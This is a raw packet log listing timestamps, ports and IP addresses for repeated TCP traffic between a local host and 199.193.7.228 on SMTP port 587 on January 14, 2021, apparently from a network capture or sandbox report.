Jan 14, 2021 08:00:39.124043941 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.125602961 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.129096031 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.154253006 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.155292988 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.155723095 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.155746937 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.155843973 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.157704115 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.158761978 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.255830050 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.287276030 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.287471056 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.324640036 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.329262972 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.329830885 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.344465971 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.344665051 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.344741106 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.344805002 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.347768068 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.347803116 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.348751068 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.349035978 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.349589109 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.373610973 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.519774914 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.526671886 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.527484894 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.539598942 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.542645931 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.564331055 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.564451933 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.590581894 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.624711037 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.717487097 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.755696058 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.757963896 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.758757114 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.809365034 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.815733910 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.817965031 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.871850014 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.892252922 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.892673969 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.948775053 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.949543953 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.950268030 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.950614929 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.950792074 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.950974941 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.951154947 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.951277018 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.951399088 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.951528072 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:40.082335949 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.082479954 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.082498074 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.082988024 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.137487888 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:40.137662888 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:40.140223980 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.140362024 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.140594959 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.140758991 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.140918016 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.141038895 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.141149998 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.141365051 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.147877932 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.149662971 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:40.339493036 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.339983940 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.339998960 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.343251944 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:40.343446970 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:40.533277035 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:40.879084110 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:40.880064011 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:41.069070101 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:41.069984913 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:41.096147060 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:41.121994972 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:41.139815092 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:41.717184067 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:41.720197916 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:41.825867891 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:41.827730894 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:41.907524109 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:41.907773972 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:41.907789946 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:41.907855988 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:41.910684109 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:41.911653996 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:41.911920071 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:41.914002895 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:41.914750099 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.015886068 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.015949011 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.016294956 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.016350031 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.018210888 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.021348000 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.104052067 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.104082108 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.104660988 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.105000973 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.105460882 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.214993954 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.215277910 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.245714903 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.295500994 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.297696114 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.298835039 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.405250072 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.405487061 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.406028032 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.436340094 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.436441898 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.488955021 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.491118908 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.493499994 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.596146107 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.597261906 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.628251076 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.628550053 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.683722019 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.686147928 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.686526060 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.787374973 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.787437916 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.788075924 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.788405895 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.796920061 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.797904015 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.818548918 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.818723917 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.818973064 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.876948118 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.912322044 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.915880919 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:42.987035036 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.987318993 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.987812042 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.988363028 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:42.988918066 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.009176016 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.012042046 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.106137991 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.107064962 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.116672993 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.116883039 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.117038012 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.117172956 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.117321968 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.117444038 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.117547035 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.179001093 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.180696011 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.181411982 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.202136993 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.202261925 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.202279091 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.202420950 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.204276085 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.205255985 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.306746960 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.306787014 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.306900978 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.306989908 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.307008028 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.307090044 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.307235003 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.307310104 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.307390928 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.307451010 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.307473898 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.307517052 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.307547092 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.307569027 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.309539080 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.372539997 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.374711037 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.375226021 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.394468069 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.394490957 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.395253897 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.395648003 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.396199942 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.497330904 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.497443914 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.497626066 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.497827053 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.497970104 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.497989893 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.498166084 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.498222113 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.499634027 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.499751091 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.565407991 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.566121101 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.566575050 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.586294889 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.589171886 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.589920998 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.687648058 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.687860966 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.687939882 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.688014030 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.688239098 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.688265085 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.688302040 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.688337088 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.688370943 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.688391924 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.688487053 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.688576937 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.688671112 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.689807892 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.689932108 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.756630898 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.779937983 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.782598972 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.783165932 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.788037062 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.789025068 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.878074884 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.878087997 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.878329039 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.878384113 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.878478050 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.878539085 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.878618956 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.878685951 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.878731966 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.878770113 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.878783941 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.878794909 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.878823042 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.878885984 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.878992081 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.879147053 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.879173040 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.879209995 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.879246950 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.879446983 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.879592896 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.879806995 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.879978895 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.879995108 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.880155087 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.880299091 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.885838985 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.886050940 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.886271954 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.886478901 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.886645079 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.886826038 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.886957884 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.887088060 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.973503113 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.976483107 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.977087021 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.978985071 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.979968071 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:43.980473042 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.980607033 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.980709076 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.980917931 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.981034994 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.981122017 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.981201887 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:43.981295109 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.068583965 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.068612099 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.068623066 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.068717003 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.068762064 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.068778038 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.068916082 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.068955898 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.069238901 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.069324017 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.069564104 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.069727898 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.069880009 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.070118904 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.070281029 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.076241970 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.076267004 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.076286077 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.077610016 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.077631950 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.077644110 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.077661037 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.086850882 CET	587	49769	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.167269945 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.170382023 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.170470953 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.170509100 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.170713902 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.170913935 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.171036005 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.171108961 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.179850101 CET	587	49770	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.191947937 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.192544937 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.267529011 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.267540932 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.382519960 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.383264065 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.384124041 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.384322882 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.384469986 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.384605885 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.384768009 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.384906054 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.385044098 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.574218988 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.574279070 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.574388027 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.574404001 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.574527979 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.574575901 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.574754953 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.574815989 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.574882030 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.574907064 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.574928999 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.575032949 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.575057030 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.575074911 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.575581074 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.588046074 CET	49769	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.590555906 CET	49777	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.658607006 CET	49770	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.764547110 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.764585972 CET	587	49771	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:44.764708042 CET	49771	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:44.764739037 CET	49771	587	192.168.2.3	199.193.7.228
